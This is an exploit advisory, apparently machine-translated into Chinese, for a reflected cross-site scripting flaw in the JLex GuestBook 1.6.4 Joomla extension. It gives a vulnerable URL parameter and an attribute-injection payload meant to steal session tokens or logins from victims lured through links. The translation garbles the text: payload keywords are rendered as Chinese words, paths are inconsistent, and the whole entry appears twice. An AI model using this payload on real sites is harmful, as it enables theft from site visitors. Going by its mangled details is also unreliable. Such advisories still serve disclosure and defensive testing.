#利用标题: JLEX GERDBOOK 1.6.4-反映XSS
#利用作者:饼干
#日期: 01/08/2023
#vendor: jlexart
#供应商HomePage: https://jlexart.com/
#软件link: https://extensions.joomla.org/extension/contacts-andacts-and-feedback/guest-book/jlex-guestbook/
#demo: https://jlexguestbook.jlexart.com/
#版本: 1.6.4
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /U /PERRY-705
获取参数“ Q”很容易受到XSS的影响
http://website/u/u/perry-705?q=[xss] wl=1
XSS有效载荷:
db8ck'onfocus='确认(1)'autocus='xwu0k
#利用作者:饼干
#日期: 01/08/2023
#vendor: jlexart
#供应商HomePage: https://jlexart.com/
#软件link: https://extensions.joomla.org/extension/contacts-andacts-and-feedback/guest-book/jlex-guestbook/
#demo: https://jlexguestbook.jlexart.com/
#版本: 1.6.4
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /U /PERRY-705
获取参数“ Q”很容易受到XSS的影响
http://website/u/u/perry-705?q=[xss] wl=1
XSS有效载荷:
db8ck'onfocus='确认(1)'autocus='xwu0k